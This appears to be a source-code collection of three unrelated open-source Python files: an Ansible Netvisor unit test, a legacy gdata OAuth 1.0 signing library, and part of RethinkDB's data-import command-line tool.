from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from units.compat.mock import patch
from ansible.modules.network.netvisor import pn_vrouter_interface_ip
from units.modules.utils import set_module_args
from .nvos_module import TestNvosModule
class TestVrouterInterfaceIpModule(TestNvosModule):
module = pn_vrouter_interface_ip
def setUp(self):
self.mock_run_nvos_commands = patch('ansible.modules.network.netvisor.pn_vrouter_interface_ip.run_cli')
self.run_nvos_commands = self.mock_run_nvos_commands.start()
self.mock_run_check_cli = patch('ansible.modules.network.netvisor.pn_vrouter_interface_ip.check_cli')
self.run_check_cli = self.mock_run_check_cli.start()
def tearDown(self):
self.mock_run_nvos_commands.stop()
self.mock_run_check_cli.stop()
def run_cli_patch(self, module, cli, state_map):
if state_map['present'] == 'vrouter-interface-ip-add':
results = dict(
changed=True,
cli_cmd=cli
)
elif state_map['absent'] == 'vrouter-interface-ip-remove':
results = dict(
changed=True,
cli_cmd=cli
)
module.exit_json(**results)
def load_fixtures(self, commands=None, state=None, transport='cli'):
self.run_nvos_commands.side_effect = self.run_cli_patch
if state == 'present':
self.run_check_cli.return_value = True, False, True
if state == 'absent':
self.run_check_cli.return_value = True, True, True
def test_vrouter_interface_ip_add(self):
set_module_args({'pn_cliswitch': 'sw01', 'pn_vrouter_name': 'foo-vrouter',
'pn_ip': '2620:0:1651:1::30', 'pn_netmask': '127', 'pn_nic': 'eth0.4092', 'state': 'present'})
result = self.execute_module(changed=True, state='present')
expected_cmd = ' switch sw01 vrouter-interface-ip-add vrouter-name foo-vrouter nic eth0.4092 '
expected_cmd += 'ip 2620:0:1651:1::30 netmask 127'
self.assertEqual(result['cli_cmd'], expected_cmd)
def test_vrouter_interface_ip_remove(self):
set_module_args({'pn_cliswitch': 'sw01', 'pn_vrouter_name': 'foo-vrouter',
'pn_ip': '2620:0:1651:1::30', 'pn_nic': 'eth0.4092', 'state': 'absent'})
result = self.execute_module(changed=True, state='absent')
expected_cmd = ' switch sw01 vrouter-interface-ip-remove vrouter-name foo-vrouter nic eth0.4092 '
expected_cmd += 'ip 2620:0:1651:1::30 '
self.assertEqual(result['cli_cmd'], expected_cmd)
| gpl-3.0 |
dya2/python-for-android | python-build/python-libs/gdata/src/gdata/oauth/__init__.py | 157 | 19407 | import cgi
import urllib
import time
import random
import urlparse
import hmac
import binascii
VERSION = '1.0' # Hi Blaine!
HTTP_METHOD = 'GET'
SIGNATURE_METHOD = 'PLAINTEXT'
# Generic exception class
class OAuthError(RuntimeError):
def __init__(self, message='OAuth error occured.'):
self.message = message
# optional WWW-Authenticate header (401 error)
def build_authenticate_header(realm=''):
return {'WWW-Authenticate': 'OAuth realm="%s"' % realm}
# url escape
def escape(s):
# escape '/' too
return urllib.quote(s, safe='~')
# util function: current timestamp
# seconds since epoch (UTC)
def generate_timestamp():
return int(time.time())
# util function: nonce
# pseudorandom number
def generate_nonce(length=8):
return ''.join([str(random.randint(0, 9)) for i in range(length)])
# OAuthConsumer is a data type that represents the identity of the Consumer
# via its shared secret with the Service Provider.
class OAuthConsumer(object):
key = None
secret = None
def __init__(self, key, secret):
self.key = key
self.secret = secret
# OAuthToken is a data type that represents an End User via either an access
# or request token.
class OAuthToken(object):
# access tokens and request tokens
key = None
secret = None
'''
key = the token
secret = the token secret
'''
def __init__(self, key, secret):
self.key = key
self.secret = secret
def to_string(self):
return urllib.urlencode({'oauth_token': self.key, 'oauth_token_secret': self.secret})
# return a token from something like:
# oauth_token_secret=digg&oauth_token=digg
def from_string(s):
params = cgi.parse_qs(s, keep_blank_values=False)
key = params['oauth_token'][0]
secret = params['oauth_token_secret'][0]
return OAuthToken(key, secret)
from_string = staticmethod(from_string)
def __str__(self):
return self.to_string()
# OAuthRequest represents the request and can be serialized
class OAuthRequest(object):
'''
OAuth parameters:
- oauth_consumer_key
- oauth_token
- oauth_signature_method
- oauth_signature
- oauth_timestamp
- oauth_nonce
- oauth_version
... any additional parameters, as defined by the Service Provider.
'''
parameters = None # oauth parameters
http_method = HTTP_METHOD
http_url = None
version = VERSION
def __init__(self, http_method=HTTP_METHOD, http_url=None, parameters=None):
self.http_method = http_method
self.http_url = http_url
self.parameters = parameters or {}
def set_parameter(self, parameter, value):
self.parameters[parameter] = value
def get_parameter(self, parameter):
try:
return self.parameters[parameter]
except:
raise OAuthError('Parameter not found: %s' % parameter)
def _get_timestamp_nonce(self):
return self.get_parameter('oauth_timestamp'), self.get_parameter('oauth_nonce')
# get any non-oauth parameters
def get_nonoauth_parameters(self):
parameters = {}
for k, v in self.parameters.iteritems():
# ignore oauth parameters
if k.find('oauth_') < 0:
parameters[k] = v
return parameters
# serialize as a header for an HTTPAuth request
def to_header(self, realm=''):
auth_header = 'OAuth realm="%s"' % realm
# add the oauth parameters
if self.parameters:
for k, v in self.parameters.iteritems():
if k[:6] == 'oauth_':
auth_header += ', %s="%s"' % (k, escape(str(v)))
return {'Authorization': auth_header}
# serialize as post data for a POST request
def to_postdata(self):
return '&'.join(['%s=%s' % (escape(str(k)), escape(str(v))) for k, v in self.parameters.iteritems()])
# serialize as a url for a GET request
def to_url(self):
return '%s?%s' % (self.get_normalized_http_url(), self.to_postdata())
# return a string that consists of all the parameters that need to be signed
def get_normalized_parameters(self):
params = self.parameters
try:
# exclude the signature if it exists
del params['oauth_signature']
except:
pass
key_values = params.items()
# sort lexicographically, first by key, then by value
key_values.sort()
# combine key value pairs in string and escape
return '&'.join(['%s=%s' % (escape(str(k)), escape(str(v))) for k, v in key_values])
# just uppercases the http method
def get_normalized_http_method(self):
return self.http_method.upper()
# parses the url and rebuilds it to be scheme://host/path
def get_normalized_http_url(self):
parts = urlparse.urlparse(self.http_url)
url_string = '%s://%s%s' % (parts[0], parts[1], parts[2]) # scheme, netloc, path
return url_string
# set the signature parameter to the result of build_signature
def sign_request(self, signature_method, consumer, token):
# set the signature method
self.set_parameter('oauth_signature_method', signature_method.get_name())
# set the signature
self.set_parameter('oauth_signature', self.build_signature(signature_method, consumer, token))
def build_signature(self, signature_method, consumer, token):
# call the build signature method within the signature method
return signature_method.build_signature(self, consumer, token)
def from_request(http_method, http_url, headers=None, parameters=None, query_string=None):
# combine multiple parameter sources
if parameters is None:
parameters = {}
# headers
if headers and 'Authorization' in headers:
auth_header = headers['Authorization']
# check that the authorization header is OAuth
if auth_header.find('OAuth') > -1:
try:
# get the parameters from the header
header_params = OAuthRequest._split_header(auth_header)
parameters.update(header_params)
except:
raise OAuthError('Unable to parse OAuth parameters from Authorization header.')
# GET or POST query string
if query_string:
query_params = OAuthRequest._split_url_string(query_string)
parameters.update(query_params)
# URL parameters
param_str = urlparse.urlparse(http_url)[4] # query
url_params = OAuthRequest._split_url_string(param_str)
parameters.update(url_params)
if parameters:
return OAuthRequest(http_method, http_url, parameters)
return None
from_request = staticmethod(from_request)
def from_consumer_and_token(oauth_consumer, token=None, http_method=HTTP_METHOD, http_url=None, parameters=None):
if not parameters:
parameters = {}
defaults = {
'oauth_consumer_key': oauth_consumer.key,
'oauth_timestamp': generate_timestamp(),
'oauth_nonce': generate_nonce(),
'oauth_version': OAuthRequest.version,
}
defaults.update(parameters)
parameters = defaults
if token:
parameters['oauth_token'] = token.key
return OAuthRequest(http_method, http_url, parameters)
from_consumer_and_token = staticmethod(from_consumer_and_token)
def from_token_and_callback(token, callback=None, http_method=HTTP_METHOD, http_url=None, parameters=None):
if not parameters:
parameters = {}
parameters['oauth_token'] = token.key
if callback:
parameters['oauth_callback'] = callback
return OAuthRequest(http_method, http_url, parameters)
from_token_and_callback = staticmethod(from_token_and_callback)
# util function: turn Authorization: header into parameters, has to do some unescaping
def _split_header(header):
params = {}
parts = header.split(',')
for param in parts:
# ignore realm parameter
if param.find('OAuth realm') > -1:
continue
# remove whitespace
param = param.strip()
# split key-value
param_parts = param.split('=', 1)
# remove quotes and unescape the value
params[param_parts[0]] = urllib.unquote(param_parts[1].strip('\"'))
return params
_split_header = staticmethod(_split_header)
# util function: turn url string into parameters, has to do some unescaping
def _split_url_string(param_str):
parameters = cgi.parse_qs(param_str, keep_blank_values=False)
for k, v in parameters.iteritems():
parameters[k] = urllib.unquote(v[0])
return parameters
_split_url_string = staticmethod(_split_url_string)
# OAuthServer is a worker to check a requests validity against a data store
class OAuthServer(object):
timestamp_threshold = 300 # in seconds, five minutes
version = VERSION
signature_methods = None
data_store = None
def __init__(self, data_store=None, signature_methods=None):
self.data_store = data_store
self.signature_methods = signature_methods or {}
def set_data_store(self, oauth_data_store):
self.data_store = oauth_data_store
def get_data_store(self):
return self.data_store
def add_signature_method(self, signature_method):
self.signature_methods[signature_method.get_name()] = signature_method
return self.signature_methods
# process a request_token request
# returns the request token on success
def fetch_request_token(self, oauth_request):
try:
# get the request token for authorization
token = self._get_token(oauth_request, 'request')
except OAuthError:
# no token required for the initial token request
version = self._get_version(oauth_request)
consumer = self._get_consumer(oauth_request)
self._check_signature(oauth_request, consumer, None)
# fetch a new token
token = self.data_store.fetch_request_token(consumer)
return token
# process an access_token request
# returns the access token on success
def fetch_access_token(self, oauth_request):
version = self._get_version(oauth_request)
consumer = self._get_consumer(oauth_request)
# get the request token
token = self._get_token(oauth_request, 'request')
self._check_signature(oauth_request, consumer, token)
new_token = self.data_store.fetch_access_token(consumer, token)
return new_token
# verify an api call, checks all the parameters
def verify_request(self, oauth_request):
# -> consumer and token
version = self._get_version(oauth_request)
consumer = self._get_consumer(oauth_request)
# get the access token
token = self._get_token(oauth_request, 'access')
self._check_signature(oauth_request, consumer, token)
parameters = oauth_request.get_nonoauth_parameters()
return consumer, token, parameters
# authorize a request token
def authorize_token(self, token, user):
return self.data_store.authorize_request_token(token, user)
# get the callback url
def get_callback(self, oauth_request):
return oauth_request.get_parameter('oauth_callback')
# optional support for the authenticate header
def build_authenticate_header(self, realm=''):
return {'WWW-Authenticate': 'OAuth realm="%s"' % realm}
# verify the correct version request for this server
def _get_version(self, oauth_request):
try:
version = oauth_request.get_parameter('oauth_version')
except:
version = VERSION
if version and version != self.version:
raise OAuthError('OAuth version %s not supported.' % str(version))
return version
# figure out the signature with some defaults
def _get_signature_method(self, oauth_request):
try:
signature_method = oauth_request.get_parameter('oauth_signature_method')
except:
signature_method = SIGNATURE_METHOD
try:
# get the signature method object
signature_method = self.signature_methods[signature_method]
except:
signature_method_names = ', '.join(self.signature_methods.keys())
raise OAuthError('Signature method %s not supported try one of the following: %s' % (signature_method, signature_method_names))
return signature_method
def _get_consumer(self, oauth_request):
consumer_key = oauth_request.get_parameter('oauth_consumer_key')
if not consumer_key:
raise OAuthError('Invalid consumer key.')
consumer = self.data_store.lookup_consumer(consumer_key)
if not consumer:
raise OAuthError('Invalid consumer.')
return consumer
# try to find the token for the provided request token key
def _get_token(self, oauth_request, token_type='access'):
token_field = oauth_request.get_parameter('oauth_token')
token = self.data_store.lookup_token(token_type, token_field)
if not token:
raise OAuthError('Invalid %s token: %s' % (token_type, token_field))
return token
def _check_signature(self, oauth_request, consumer, token):
timestamp, nonce = oauth_request._get_timestamp_nonce()
self._check_timestamp(timestamp)
self._check_nonce(consumer, token, nonce)
signature_method = self._get_signature_method(oauth_request)
try:
signature = oauth_request.get_parameter('oauth_signature')
except:
raise OAuthError('Missing signature.')
# validate the signature
valid_sig = signature_method.check_signature(oauth_request, consumer, token, signature)
if not valid_sig:
key, base = signature_method.build_signature_base_string(oauth_request, consumer, token)
raise OAuthError('Invalid signature. Expected signature base string: %s' % base)
def _check_timestamp(self, timestamp):
# verify that timestamp is recentish
timestamp = int(timestamp)
now = int(time.time())
lapsed = now - timestamp
if lapsed > self.timestamp_threshold:
raise OAuthError('Expired timestamp: given %d and now %s has a greater difference than threshold %d' % (timestamp, now, self.timestamp_threshold))
def _check_nonce(self, consumer, token, nonce):
# verify that the nonce is uniqueish
nonce = self.data_store.lookup_nonce(consumer, token, nonce)
if nonce:
raise OAuthError('Nonce already used: %s' % str(nonce))
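# Hedged sketch (not part of the original module): the service-provider side of
# the flow above, assuming the caller supplies a concrete OAuthDataStore
# subclass; the helper name and arguments are illustrative only.
def _example_verify_incoming_request(data_store, http_method, http_url, headers, query_string):
    server = OAuthServer(data_store=data_store)
    server.add_signature_method(OAuthSignatureMethod_HMAC_SHA1())
    oauth_request = OAuthRequest.from_request(
        http_method, http_url, headers=headers, query_string=query_string)
    # verify_request raises OAuthError if the signature, timestamp or nonce checks fail
    return server.verify_request(oauth_request)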
# OAuthClient is a worker to attempt to execute a request
class OAuthClient(object):
consumer = None
token = None
def __init__(self, oauth_consumer, oauth_token):
self.consumer = oauth_consumer
self.token = oauth_token
def get_consumer(self):
return self.consumer
def get_token(self):
return self.token
def fetch_request_token(self, oauth_request):
# -> OAuthToken
raise NotImplementedError
def fetch_access_token(self, oauth_request):
# -> OAuthToken
raise NotImplementedError
def access_resource(self, oauth_request):
# -> some protected resource
raise NotImplementedError
# OAuthDataStore is a database abstraction used to lookup consumers and tokens
class OAuthDataStore(object):
def lookup_consumer(self, key):
# -> OAuthConsumer
raise NotImplementedError
def lookup_token(self, oauth_consumer, token_type, token_token):
# -> OAuthToken
raise NotImplementedError
def lookup_nonce(self, oauth_consumer, oauth_token, nonce, timestamp):
# -> OAuthToken
raise NotImplementedError
def fetch_request_token(self, oauth_consumer):
# -> OAuthToken
raise NotImplementedError
def fetch_access_token(self, oauth_consumer, oauth_token):
# -> OAuthToken
raise NotImplementedError
def authorize_request_token(self, oauth_token, user):
# -> OAuthToken
raise NotImplementedError
# OAuthSignatureMethod is a strategy class that implements a signature method
class OAuthSignatureMethod(object):
def get_name(self):
# -> str
raise NotImplementedError
def build_signature_base_string(self, oauth_request, oauth_consumer, oauth_token):
# -> str key, str raw
raise NotImplementedError
def build_signature(self, oauth_request, oauth_consumer, oauth_token):
# -> str
raise NotImplementedError
def check_signature(self, oauth_request, consumer, token, signature):
built = self.build_signature(oauth_request, consumer, token)
return built == signature
class OAuthSignatureMethod_HMAC_SHA1(OAuthSignatureMethod):
def get_name(self):
return 'HMAC-SHA1'
def build_signature_base_string(self, oauth_request, consumer, token):
sig = (
escape(oauth_request.get_normalized_http_method()),
escape(oauth_request.get_normalized_http_url()),
escape(oauth_request.get_normalized_parameters()),
)
key = '%s&' % escape(consumer.secret)
if token:
key += escape(token.secret)
raw = '&'.join(sig)
return key, raw
def build_signature(self, oauth_request, consumer, token):
# build the base signature string
key, raw = self.build_signature_base_string(oauth_request, consumer, token)
# hmac object
try:
import hashlib # 2.5
hashed = hmac.new(key, raw, hashlib.sha1)
except:
import sha # deprecated
hashed = hmac.new(key, raw, sha)
# calculate the digest base 64
return binascii.b2a_base64(hashed.digest())[:-1]
class OAuthSignatureMethod_PLAINTEXT(OAuthSignatureMethod):
def get_name(self):
return 'PLAINTEXT'
def build_signature_base_string(self, oauth_request, consumer, token):
# concatenate the consumer key and secret
sig = escape(consumer.secret) + '&'
if token:
sig = sig + escape(token.secret)
return sig
def build_signature(self, oauth_request, consumer, token):
return self.build_signature_base_string(oauth_request, consumer, token)
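# Hedged usage sketch (not part of the original module): how a consumer builds
# and signs a request for a protected resource with the classes above; the
# key, secret, token and URL values are placeholders.
def _example_signed_request_url():
    consumer = OAuthConsumer('example-consumer-key', 'example-consumer-secret')
    token = OAuthToken('example-token', 'example-token-secret')
    request = OAuthRequest.from_consumer_and_token(
        consumer, token=token, http_method='GET',
        http_url='http://example.com/photos',
        parameters={'file': 'vacation.jpg'})
    request.sign_request(OAuthSignatureMethod_HMAC_SHA1(), consumer, token)
    # the signed parameters could equally be sent via to_header() or to_postdata()
    return request.to_url()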
| apache-2.0 |
tempbottle/rethinkdb | drivers/python/rethinkdb/_import.py | 9 | 39332 | #!/usr/bin/env python
from __future__ import print_function
import signal
import sys, os, datetime, time, json, traceback, csv
import multiprocessing, multiprocessing.queues, subprocess, re, ctypes, codecs
from optparse import OptionParser
from ._backup import *
import rethinkdb as r
# Used because of API differences in the csv module, taken from
# http://python3porting.com/problems.html
PY3 = sys.version > '3'
#json parameters
json_read_chunk_size = 32 * 1024
json_max_buffer_size = 128 * 1024 * 1024
try:
import cPickle as pickle
except ImportError:
import pickle
try:
from itertools import imap
except ImportError:
imap = map
try:
xrange
except NameError:
xrange = range
try:
from multiprocessing import SimpleQueue
except ImportError:
from multiprocessing.queues import SimpleQueue
info = "'rethinkdb import` loads data into a RethinkDB cluster"
usage = "\
rethinkdb import -d DIR [-c HOST:PORT] [-a AUTH_KEY] [--force]\n\
[-i (DB | DB.TABLE)] [--clients NUM]\n\
rethinkdb import -f FILE --table DB.TABLE [-c HOST:PORT] [-a AUTH_KEY]\n\
[--force] [--clients NUM] [--format (csv | json)] [--pkey PRIMARY_KEY]\n\
[--delimiter CHARACTER] [--custom-header FIELD,FIELD... [--no-header]]"
def print_import_help():
print(info)
print(usage)
print("")
print(" -h [ --help ] print this help")
print(" -c [ --connect ] HOST:PORT host and client port of a rethinkdb node to connect")
print(" to (defaults to localhost:28015)")
print(" -a [ --auth ] AUTH_KEY authorization key for rethinkdb clients")
print(" --clients NUM_CLIENTS the number of client connections to use (defaults")
print(" to 8)")
print(" --hard-durability use hard durability writes (slower, but less memory")
print(" consumption on the server)")
print(" --force import data even if a table already exists, and")
print(" overwrite duplicate primary keys")
print(" --fields limit which fields to use when importing one table")
print("")
print("Import directory:")
print(" -d [ --directory ] DIR the directory to import data from")
print(" -i [ --import ] (DB | DB.TABLE) limit restore to the given database or table (may")
print(" be specified multiple times)")
print(" --no-secondary-indexes do not create secondary indexes for the imported tables")
print("")
print("Import file:")
print(" -f [ --file ] FILE the file to import data from")
print(" --table DB.TABLE the table to import the data into")
print(" --format (csv | json) the format of the file (defaults to json)")
print(" --pkey PRIMARY_KEY the field to use as the primary key in the table")
print("")
print("Import CSV format:")
print(" --delimiter CHARACTER character separating fields, or '\\t' for tab")
print(" --no-header do not read in a header of field names")
print(" --custom-header FIELD,FIELD... header to use (overriding file header), must be")
print(" specified if --no-header")
print("")
print("Import JSON format:")
print(" --max-document-size the maximum size in bytes that a single JSON document")
print(" can have (defaults to 134217728).")
print("")
print("EXAMPLES:")
print("")
print("rethinkdb import -d rdb_export -c mnemosyne:39500 --clients 128")
print(" Import data into a cluster running on host 'mnemosyne' with a client port at 39500,")
print(" using 128 client connections and the named export directory.")
print("")
print("rethinkdb import -f site_history.csv --format csv --table test.history --pkey count")
print(" Import data into a local cluster and the table 'history' in the 'test' database,")
print(" using the named CSV file, and using the 'count' field as the primary key.")
print("")
print("rethinkdb import -d rdb_export -c hades -a hunter2 -i test")
print(" Import data into a cluster running on host 'hades' which requires authorization,")
print(" using only the database 'test' from the named export directory.")
print("")
print("rethinkdb import -f subscriber_info.json --fields id,name,hashtag --force")
print(" Import data into a local cluster using the named JSON file, and only the fields")
print(" 'id', 'name', and 'hashtag', overwriting any existing rows with the same primary key.")
print("")
print("rethinkdb import -f user_data.csv --delimiter ';' --no-header --custom-header id,name,number")
print(" Import data into a local cluster using the named CSV file with no header and instead")
print(" use the fields 'id', 'name', and 'number', the delimiter is a semicolon (rather than")
print(" a comma).")
def parse_options():
parser = OptionParser(add_help_option=False, usage=usage)
parser.add_option("-c", "--connect", dest="host", metavar="HOST:PORT", default="localhost:28015", type="string")
parser.add_option("-a", "--auth", dest="auth_key", metavar="AUTHKEY", default="", type="string")
parser.add_option("--fields", dest="fields", metavar="FIELD,FIELD...", default=None, type="string")
parser.add_option("--clients", dest="clients", metavar="NUM_CLIENTS", default=8, type="int")
parser.add_option("--hard-durability", dest="hard", action="store_true", default=False)
parser.add_option("--force", dest="force", action="store_true", default=False)
parser.add_option("--debug", dest="debug", action="store_true", default=False)
parser.add_option("--max-document-size", dest="max_document_size", default=0,type="int")
# Directory import options
parser.add_option("-d", "--directory", dest="directory", metavar="DIRECTORY", default=None, type="string")
parser.add_option("-i", "--import", dest="tables", metavar="DB | DB.TABLE", default=[], action="append", type="string")
parser.add_option("--no-secondary-indexes", dest="create_sindexes", action="store_false", default=True)
# File import options
parser.add_option("-f", "--file", dest="import_file", metavar="FILE", default=None, type="string")
parser.add_option("--format", dest="import_format", metavar="json | csv", default=None, type="string")
parser.add_option("--table", dest="import_table", metavar="DB.TABLE", default=None, type="string")
parser.add_option("--pkey", dest="primary_key", metavar="KEY", default=None, type="string")
parser.add_option("--delimiter", dest="delimiter", metavar="CHARACTER", default=None, type="string")
parser.add_option("--no-header", dest="no_header", action="store_true", default=False)
parser.add_option("--custom-header", dest="custom_header", metavar="FIELD,FIELD...", default=None, type="string")
parser.add_option("-h", "--help", dest="help", default=False, action="store_true")
(options, args) = parser.parse_args()
# Check validity of arguments
if len(args) != 0:
raise RuntimeError("Error: No positional arguments supported. Unrecognized option '%s'" % args[0])
if options.help:
print_import_help()
exit(0)
res = {}
# Verify valid host:port --connect option
(res["host"], res["port"]) = parse_connect_option(options.host)
if options.clients < 1:
raise RuntimeError("Error: --client option too low, must have at least one client connection")
res["auth_key"] = options.auth_key
res["clients"] = options.clients
res["durability"] = "hard" if options.hard else "soft"
res["force"] = options.force
res["debug"] = options.debug
res["create_sindexes"] = options.create_sindexes
# Default behavior for csv files - may be changed by options
res["delimiter"] = ","
res["no_header"] = False
res["custom_header"] = None
# buffer size
if options.max_document_size > 0:
global json_max_buffer_size
json_max_buffer_size = options.max_document_size
if options.directory is not None:
# Directory mode, verify directory import options
if options.import_file is not None:
raise RuntimeError("Error: --file option is not valid when importing a directory")
if options.import_format is not None:
raise RuntimeError("Error: --format option is not valid when importing a directory")
if options.import_table is not None:
raise RuntimeError("Error: --table option is not valid when importing a directory")
if options.primary_key is not None:
raise RuntimeError("Error: --pkey option is not valid when importing a directory")
if options.delimiter is not None:
raise RuntimeError("Error: --delimiter option is not valid when importing a directory")
if options.no_header is not False:
raise RuntimeError("Error: --no-header option is not valid when importing a directory")
if options.custom_header is not None:
raise RuntimeError("Error: --custom-header option is not valid when importing a directory")
# Verify valid directory option
dirname = options.directory
res["directory"] = os.path.abspath(dirname)
if not os.path.exists(res["directory"]):
raise RuntimeError("Error: Directory to import does not exist: %d" % res["directory"])
# Verify valid --import options
res["db_tables"] = parse_db_table_options(options.tables)
# Parse fields
if options.fields is None:
res["fields"] = None
elif len(res["db_tables"]) != 1 or res["db_tables"][0][1] is None:
raise RuntimeError("Error: Can only use the --fields option when importing a single table")
else:
res["fields"] = options.fields.split(",")
elif options.import_file is not None:
# Single file mode, verify file import options
if len(options.tables) != 0:
raise RuntimeError("Error: --import option is not valid when importing a single file")
if options.directory is not None:
raise RuntimeError("Error: --directory option is not valid when importing a single file")
import_file = options.import_file
res["import_file"] = os.path.abspath(import_file)
if not os.path.exists(res["import_file"]):
raise RuntimeError("Error: File to import does not exist: %s" % res["import_file"])
# Verify valid --format option
if options.import_format is None:
options.import_format = os.path.split(options.import_file)[1].split(".")[-1]
if options.import_format not in ["csv", "json"]:
options.import_format = "json"
res["import_format"] = options.import_format
elif options.import_format not in ["csv", "json"]:
raise RuntimeError("Error: Unknown format '%s', valid options are 'csv' and 'json'" % options.import_format)
else:
res["import_format"] = options.import_format
# Verify valid --table option
if options.import_table is None:
raise RuntimeError("Error: Must specify a destination table to import into using the --table option")
res["import_db_table"] = parse_db_table(options.import_table)
if res["import_db_table"][1] is None:
raise RuntimeError("Error: Invalid 'db.table' format: %s" % options.import_table)
# Parse fields
if options.fields is None:
res["fields"] = None
else:
res["fields"] = options.fields.split(",")
if options.import_format == "csv":
if options.delimiter is None:
res["delimiter"] = ","
else:
if len(options.delimiter) == 1:
res["delimiter"] = options.delimiter
elif options.delimiter == "\\t":
res["delimiter"] = "\t"
else:
raise RuntimeError("Error: Must specify only one character for the --delimiter option")
if options.custom_header is None:
res["custom_header"] = None
else:
res["custom_header"] = options.custom_header.split(",")
if options.no_header == True and options.custom_header is None:
raise RuntimeError("Error: Cannot import a CSV file with --no-header and no --custom-header option")
res["no_header"] = options.no_header
else:
if options.delimiter is not None:
raise RuntimeError("Error: --delimiter option is only valid for CSV file formats")
if options.no_header == True:
raise RuntimeError("Error: --no-header option is only valid for CSV file formats")
if options.custom_header is not None:
raise RuntimeError("Error: --custom-header option is only valid for CSV file formats")
res["primary_key"] = options.primary_key
else:
raise RuntimeError("Error: Must specify one of --directory or --file to import")
return res
# This is called through rdb_call_wrapper so reattempts can be tried as long as progress
# is being made, but connection errors occur. We save a failed task in the progress object
# so it can be resumed later on a new connection.
def import_from_queue(progress, conn, task_queue, error_queue, replace_conflicts, durability, write_count):
if progress[0] is not None and not replace_conflicts:
# We were interrupted and it's not ok to overwrite rows, check that the batch either:
# a) does not exist on the server
# b) is exactly the same on the server
task = progress[0]
pkey = r.db(task[0]).table(task[1]).info().run(conn)["primary_key"]
for i in reversed(range(len(task[2]))):
obj = pickle.loads(task[2][i])
if pkey not in obj:
raise RuntimeError("Connection error while importing. Current row has no specified primary key, so cannot guarantee absence of duplicates")
row = r.db(task[0]).table(task[1]).get(obj[pkey]).run(conn)
if row == obj:
write_count[0] += 1
del task[2][i]
else:
raise RuntimeError("Duplicate primary key `%s`:\n%s\n%s" % (pkey, str(obj), str(row)))
task = task_queue.get() if progress[0] is None else progress[0]
while not isinstance(task, StopIteration):
try:
# Unpickle objects (TODO: super inefficient, would be nice if we could pass down json)
objs = [pickle.loads(obj) for obj in task[2]]
conflict_action = 'replace' if replace_conflicts else 'error'
res = r.db(task[0]).table(task[1]).insert(objs, durability=durability, conflict=conflict_action).run(conn)
except:
progress[0] = task
raise
if res["errors"] > 0:
raise RuntimeError("Error when importing into table '%s.%s': %s" %
(task[0], task[1], res["first_error"]))
write_count[0] += len(objs)
task = task_queue.get()
# This is run for each client requested, and accepts tasks from the reader processes
def client_process(host, port, auth_key, task_queue, error_queue, rows_written, replace_conflicts, durability):
try:
conn_fn = lambda: r.connect(host, port, auth_key=auth_key)
write_count = [0]
rdb_call_wrapper(conn_fn, "import", import_from_queue, task_queue, error_queue, replace_conflicts, durability, write_count)
except:
ex_type, ex_class, tb = sys.exc_info()
error_queue.put((ex_type, ex_class, traceback.extract_tb(tb)))
# Read until the exit event so the readers do not hang on pushing onto the queue
while not isinstance(task_queue.get(), StopIteration):
pass
with rows_written.get_lock():
rows_written.value += write_count[0]
batch_length_limit = 200
batch_size_limit = 500000
class InterruptedError(Exception):
def __str__(self):
return "Interrupted"
# This function is called for each object read from a file by the reader processes
# and will push tasks to the client processes on the task queue
def object_callback(obj, db, table, task_queue, object_buffers, buffer_sizes, fields, exit_event):
global batch_size_limit
global batch_length_limit
if exit_event.is_set():
raise InterruptedError()
if not isinstance(obj, dict):
raise RuntimeError("Error: Invalid input, expected an object, but got %s" % type(obj))
# filter out fields
if fields is not None:
for key in list(obj.keys()):
if key not in fields:
del obj[key]
# Pickle the object here because we want an accurate size, and it'll pickle anyway for IPC
object_buffers.append(pickle.dumps(obj))
buffer_sizes.append(len(object_buffers[-1]))
if len(object_buffers) >= batch_length_limit or sum(buffer_sizes) > batch_size_limit:
task_queue.put((db, table, object_buffers))
del object_buffers[0:len(object_buffers)]
del buffer_sizes[0:len(buffer_sizes)]
return obj
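# Hedged illustration (not part of the importer): each batch flushed above is a
# (db, table, [pickled rows]) tuple, for example
#     ("test", "history", [pickle.dumps({"id": 1}), pickle.dumps({"id": 2})])
# A batch is flushed once it reaches batch_length_limit rows or its pickled size
# exceeds batch_size_limit bytes; client_process workers then unpickle and insert it.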
def read_json_array(json_data, file_in, callback, progress_info,
json_array=True):
decoder = json.JSONDecoder()
file_offset = 0
offset = 0
while True:
try:
offset = json.decoder.WHITESPACE.match(json_data, offset).end()
if json_array and json_data[offset] == "]":
break # End of JSON
(obj, offset) = decoder.raw_decode(json_data, idx=offset)
callback(obj)
# Read past whitespace to the next record
file_offset += offset
json_data = json_data[offset:]
offset = json.decoder.WHITESPACE.match(json_data, 0).end()
if json_array and json_data[offset] == ",":
# Read past the comma
offset = json.decoder.WHITESPACE.match(json_data, offset + 1).end()
elif json_array and json_data[offset] != "]":
raise ValueError("Error: JSON format not recognized - expected ',' or ']' after object")
except (ValueError, IndexError):
before_len = len(json_data)
to_read = max(json_read_chunk_size, before_len)
json_data += file_in.read(min(to_read, json_max_buffer_size - before_len))
if json_array and json_data[offset] == ",":
offset = json.decoder.WHITESPACE.match(json_data, offset + 1).end()
elif (not json_array) and before_len == len(json_data):
break # End of JSON
elif before_len == len(json_data) :
raise
elif len(json_data) >= json_max_buffer_size:
raise ValueError("Error: JSON max buffer size exceeded. Use '--max-document-size' to extend your buffer.")
progress_info[0].value = file_offset
# Read the rest of the file and return it so it can be checked for unexpected data
json_data += file_in.read()
return json_data[offset + 1:]
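# Hedged sketch (not part of the importer): exercising read_json_array on an
# in-memory JSON array to show the incremental decode-and-callback flow; the
# sample rows and the io.StringIO stand-in for a file are assumptions.
def _example_read_json_array():
    import io
    progress = (multiprocessing.Value(ctypes.c_longlong, 0),
                multiprocessing.Value(ctypes.c_longlong, 0))
    seen = []
    data = '[{"id": 1}, {"id": 2}]'
    # json_reader strips the opening '[' before delegating, so do the same here
    read_json_array(data[1:], io.StringIO(), seen.append, progress)
    return seen  # -> [{'id': 1}, {'id': 2}]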
def json_reader(task_queue, filename, db, table, fields, progress_info, exit_event):
object_buffers = []
buffer_sizes = []
with open(filename, "r") as file_in:
# Scan to the first '[', then load objects one-by-one
# Read in the data in chunks, since the json module would just read the whole thing at once
json_data = file_in.read(json_read_chunk_size)
callback = lambda x: object_callback(x, db, table, task_queue, object_buffers,
buffer_sizes, fields, exit_event)
progress_info[1].value = os.path.getsize(filename)
offset = json.decoder.WHITESPACE.match(json_data, 0).end()
if json_data[offset] in "[{":
json_data = read_json_array(
json_data[offset + (1 if json_data[offset] == "[" else 0):],
file_in, callback, progress_info,
json_data[offset] == "[")
else:
raise RuntimeError("Error: JSON format not recognized - file does not begin with an object or array")
